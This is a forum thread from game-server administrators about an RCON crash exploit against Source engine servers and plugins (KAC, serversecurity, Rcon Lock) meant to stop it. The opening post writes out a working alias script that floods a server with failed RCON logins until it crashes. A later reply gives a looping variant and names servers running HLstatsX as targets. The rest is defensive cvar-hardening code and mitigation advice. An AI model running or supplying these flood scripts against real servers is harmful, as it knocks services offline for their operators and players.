KAC RCON crashprevent Exploit ?

Ma$terG · **Author**

kac_rcon_crashprevent 1 -> server.cfg
kac version 1.2.1.0
can't prevent rcon crash exploit using this script

Code:

alias "r10" "Rcon;Rcon;Rcon;Rcon;Rcon;Rcon;Rcon;Rcon;Rcon;Rcon "
alias "r100" "r10;r10;r10;r10;r10;r10;r10;r10;r10;r10"
alias "r1000" "r100;r100;r100;r100;r100;r100;r100;r100;r100;r100 "
alias "Crash" "Server;wait;Rcon_password "Randomletters";wait;wait;r1000"
Echo "!>>--Ready--<<!"
wait
wait
wait
 
Echo Please Name server (alias Server "rcon_address Server I.P.")
Wait
Echo When ready type Crash

script taken from http://www.sythe.org/showpost.php?p=5663084&postcount=3

only plugin that prevents server crash is serversecurity

http://forums.eventscripts.com/viewt...p?f=27&t=33974

can you update your KAC for preventing this crash ?

code extracted from servsecurity.py file

Code:

def DisableRCONCrashExploit(check):
    if check != 1:
        return
    es.forcevalue('sv_rcon_minfailures', 99999999)
    es.forcevalue('sv_rcon_maxfailures', 99999999)
    es.forcevalue('sv_rcon_minfailuretime', 1)
    Log(3, "RCON crash exploit disabled")

there are similar plugin on this forum have similar code also, but not working, server can be crashed.

ulx · 04-15-2010 , 05:44 Re: KAC RCON crashprevent Exploit ?

yep, serversecurity is preventing this and I'm using it, too ... it sets the above mentioned cvars to 99999999 at every roundstart, maybe that helps @Kigen.

Ma$terG · 04-15-2010 , 15:24 Re: KAC RCON crashprevent Exploit ?

Code:

 
new Handle:sv_rcon_minfailures;
new Handle:sv_rcon_maxfailures;
public OnPluginStart()
{
sv_rcon_minfailuretime = FindConVar("sv_rcon_minfailuretime");
sv_rcon_minfailures = FindConVar("sv_rcon_minfailures");
sv_rcon_maxfailures = FindConVar("sv_rcon_maxfailures");
SetConVarBounds(sv_rcon_minfailures, ConVarBound_Upper, false);
SetConVarBounds(sv_rcon_maxfailures, ConVarBound_Upper, false);

}
 
public OnConfigsExecuted()
{
SetConVarInt(sv_rcon_minfailuretime, 1);
SetConVarInt(sv_rcon_minfailures, 9999999);
SetConVarInt(sv_rcon_maxfailures, 9999999);
}

this code have been posted here on forum ( cant find link ),
but this code realy dont force cvar's like does plugin from eventscript's ( servsecurity ) which prevent's this server crash...

hope that this info will help good coder to make same plugin for sourcemod

info: sv_rcon_maxfailures using servsecurity plugin for eventrscript's

Code:

21:19:10 "sv_rcon_maxfailures" = "99999999" ( def. "10" ) min. 99999.000000 max. 99999.000000
          - Max number of times a user can fail rcon authentication before being banned

info: sv_rcon_maxfailures using this source mode script

Code:

21:20:20 "sv_rcon_maxfailures" = "99999" ( def. "10" ) min. 1.000000 max. 99999.000000
          - Max number of times a user can fail rcon authentication before being banned

something with forceCvar

blodia · 04-16-2010 , 15:02 Re: KAC RCON crashprevent Exploit ?

i just tested this

PHP Code:


			
new Handle:sv_rcon_minfailures;

new Handle:sv_rcon_maxfailures;

new Handle:sv_rcon_minfailuretime;



public OnPluginStart()

{

    sv_rcon_minfailuretime = FindConVar("sv_rcon_minfailuretime");

    sv_rcon_minfailures = FindConVar("sv_rcon_minfailures");

    sv_rcon_maxfailures = FindConVar("sv_rcon_maxfailures");

    SetConVarBounds(sv_rcon_minfailures, ConVarBound_Lower, true, 999999999.0);

    SetConVarBounds(sv_rcon_minfailures, ConVarBound_Upper, true, 999999999.0);

    SetConVarBounds(sv_rcon_maxfailures, ConVarBound_Lower, true, 999999999.0);

    SetConVarBounds(sv_rcon_maxfailures, ConVarBound_Upper, true, 999999999.0);

    SetConVarInt(sv_rcon_minfailuretime, 1);

    SetConVarInt(sv_rcon_minfailures, 999999999);

    SetConVarInt(sv_rcon_maxfailures, 999999999);

}

and heres the console output

PHP Code:


			
] sv_rcon_maxfailures

"sv_rcon_maxfailures" = "999999999" ( def. "10" ) min. 1000000000.000000 max. 1000000000.000000

 - Max number of times a user can fail rcon authentication before being banned

] sv_rcon_minfailures

"sv_rcon_minfailures" = "999999999" ( def. "5" ) min. 1000000000.000000 max. 1000000000.000000

 - Number of times a user can fail rcon authentication in sv_rcon_minfailuretime before being banned

**KyleS** · 04-16-2010 , 15:56 Re: KAC RCON crashprevent Exploit ?

KAC already prevents this, along with Rcon Locker. Just make sure you don't edit the values in the plugin as it hooks the change, it doesn't check the existing cvar.

KawMAN · *Last edited by KawMAN; 04-22-2010 at 05:56.*

changing min/max will not fix that exploit, just create command send loop like this

PHP Code:


			
alias rc "magic here;rc"

...

rc

as i knonw there is only 2 fix

1. block server tcp port via firewall (like iptables)
2. stop using RCON protocol ,disable rcon in HLstatsX and everything that use rcon. Exploit works only when something is connected via rcon with valid password. Thats why servers with hlstatsx are great targets

egor1908 · 04-21-2010 , 04:28 Re: KAC RCON crashprevent Exploit ?

Please remove these exploits from your posts.

psychonic · 04-21-2010 , 07:57 Re: KAC RCON crashprevent Exploit ?

Quote:

Originally Posted by KawMAN

changing min/max will not fix that exploit

That is why Rcon Lock (and probably KAC) just remove the max limit instead of just setting it high.